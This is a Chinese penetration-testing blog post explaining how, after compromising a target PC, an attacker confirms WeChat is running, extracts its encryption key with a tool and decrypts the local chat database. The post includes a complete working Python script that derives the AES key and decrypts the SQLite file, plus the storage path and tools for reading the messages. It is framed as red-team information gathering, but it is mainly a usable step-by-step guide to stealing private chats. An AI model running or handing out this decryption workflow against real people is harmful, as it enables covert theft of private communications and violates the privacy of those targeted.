• 首页
  • Web安全
    • 神兵利器
    • 漏洞知识库
    • 小白专享
  • 关于
    • 关于作者
  • 大老李的店铺
  • 网络安全网址导航
文章
文章用户文档网址导航问答

{{userData.name}}已认证

文章

评论

关注

粉丝

¥{{role.user_data.money}}
{{role.user_data.credit}}
您已完成今天任务的
  • 私信列表所有往来私信

  • 任务中心每日任务

    NEW
  • 成为会员购买付费会员

  • 认证服务申请认证

    NEW
  • 小黑屋关进小黑屋的人

    NEW
  • 进入后台管理

信息收集之获取微信聊天记录

  • 渗透测试
  • 22年12月16日
  • 编辑
laolisafe
释放双眼,带上耳机,听听看~!

在内网渗透中 一般我的习惯是先打一台PC机,当通过某种手段拿下PC机后进行信息手机大概是可以用到,另一种是获取了登录账号密码,没有远程 也可以通过smb将文件传回本地进行信息收集。

下面就手把手教大伙如何获取目标的聊天记录~~

目标上线后可以通过VNC、截图、tasklist等多种手段来确认微信是否开启

获取key

使用工具 获取微信key

获取key后通过脚本进行解密
python3

from Crypto.Cipher import AES
import hashlib, hmac, ctypes, sys, getopt

SQLITE_FILE_HEADER = bytes('SQLite format 3', encoding='ASCII') + bytes(1)
IV_SIZE = 16
HMAC_SHA1_SIZE = 20
KEY_SIZE = 32
DEFAULT_PAGESIZE = 4096
DEFAULT_ITER = 64000
opts, args = getopt.getopt(sys.argv[1:], 'hk:d:')
input_pass = ''
input_dir = ''

for op, value in opts:
    if op == '-k':
        input_pass = value
    else:
        if op == '-d':
            input_dir = value

password = bytes.fromhex(input_pass.replace(' ', ''))

with open(input_dir, 'rb') as (f):
    blist = f.read()
print(len(blist))
salt = blist[:16]
key = hashlib.pbkdf2_hmac('sha1', password, salt, DEFAULT_ITER, KEY_SIZE)
first = blist[16:DEFAULT_PAGESIZE]
mac_salt = bytes([x ^ 58 for x in salt])
mac_key = hashlib.pbkdf2_hmac('sha1', key, mac_salt, 2, KEY_SIZE)
hash_mac = hmac.new(mac_key, digestmod='sha1')
hash_mac.update(first[:-32])
hash_mac.update(bytes(ctypes.c_int(1)))

if hash_mac.digest() == first[-32:-12]:
    print('Decryption Success')
else:
    print('Password Error')
blist = [blist[i:i + DEFAULT_PAGESIZE] for i in range(DEFAULT_PAGESIZE, len(blist), DEFAULT_PAGESIZE)]

with open(input_dir, 'wb') as (f):
    f.write(SQLITE_FILE_HEADER)
    t = AES.new(key, AES.MODE_CBC, first[-48:-32])
    f.write(t.decrypt(first[:-48]))
    f.write(first[-48:])
    for i in blist:
        t = AES.new(key, AES.MODE_CBC, i[-48:-32])
        f.write(t.decrypt(i[:-48]))
        f.write(i[-48:])

运行脚本安装pip包时,我出现了一写的问题,原因是安装的包冲突了
解决:

卸载crypto

pip3 uninstall crypto

卸载

pip3 uninstall pycrypto

重新安装

pip3 install crypto

此时就可以运行起来

解密

微信默认安装路径为:

微信聊天db文件存储路径为:

C:\Users\xxxx\Documents\WeChat Files\xxxx\Msg\Multi

查询聊天记录

使用navicat连接db文件


查询聊天记录


使用db browser查询

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。

给TA打赏
共{{data.count}}人
人已打赏
渗透测试

thinkphp最新rce(Thinkphp,v6.0.1~v6.0.13,v5.0.x,v5.1.x)

2022-12-12 12:43:38

渗透测试

一文教你将个人微信化身ChatGPT机器人

2022-12-18 16:54:10

1 条回复 A文章作者 M管理员

您必须登录或注册以后才能发表评论

  1. laolisafe
    laolisafeAM 见习白帽子lv2
    22年12月16日

文章

评论

关注

粉丝

{{userData.task+'%'}}

嗨!朋友

所有的伟大,都源于一个勇敢的开始

{{open.name}}登录
  • 公告:
没有公告
全部公告

签到排行
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{data.mission.credit}}积分

今日签到

连续签到

签到排行

标签

0day 0基础入门渗透测试 74cms ActiveMQ Adobe ColdFusion APP渗透 APP渗透测试 cdn绕过 cmd命令 cmd渗透命令 cobaltstrike CVE CVE-2018-10933 CVE-2018-17182 dedecms dedecmsgetshell exp hash HW HW行动 poc qq一对一裸聊 Struts2 Struts2-057 thinkphp thinkphp 3.2.3 Web安全 web安全入门 反序列化 大老李课堂开课啦 实战渗透 往年文章 微擎 深信服0day 渗透思路 渗透测试 社工 红蓝对抗 老李鸡汤 老李鸡汤 蓝队蜜罐列表泄露 裸聊APP诈骗 裸聊骗局 通达OA 防御

积分排行

积分排行

商品聚合

  • (网络安全课程)最新Linux从入门到精通

    (网络安全课程)最新Linux从入门到精通

    ¥ 100
  • (网络安全课程)渗透测试Web安全课程

    (网络安全课程)渗透测试Web安全课程

    ¥ 100
  • (网络安全课程)安卓APP逆向百集完整版

    (网络安全课程)安卓APP逆向百集完整版

    ¥ 100
  • (网络安全课程)iOS安全攻防实战视频课程

    (网络安全课程)iOS安全攻防实战视频课程

    ¥ 100
  • Photoshop 2023 v24.2.0.315特别版

    Photoshop 2023 v24.2.0.315特别版

    ¥ 10
  • 【亲测】微信真实好友检测工具v4.0

    【亲测】微信真实好友检测工具v4.0

    ¥ 10
❯

解锁会员权限

开通会员

解锁海量优质VIP资源

立刻开通

个人中心
今日签到
有新私信 私信列表
搜索
  • 扫码打开当前页

  • 微信公众号

返回顶部
幸运之星正在降临...
点击领取今天的签到奖励!
恭喜!您今天获得了{{mission.data.mission.credit}}积分

今日签到

连续签到

  • {{item.credit}}
  • 连续{{item.count}}天
查看所有
我的优惠劵
  • ¥优惠劵
    使用时效:无法使用
    使用时效:

    之前

    使用时效:永久有效
    优惠劵ID:
    ×
    限制以下商品使用: 限制以下商品分类使用: 不限制使用:
    [{{ct.name}}]
    所有商品和商品类型均可使用
没有优惠劵可用!

购物车
  • ×
    删除
购物车空空如也!

清空购物车 前往结算
您有新的私信
没有新私信
写新私信 查看全部
Copyright © 2025 老李安全|大老李|大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区
・冀ICP备15012535号-3
查询 96 次,耗时 0.4762 秒
首页专题认证
搜索菜单我的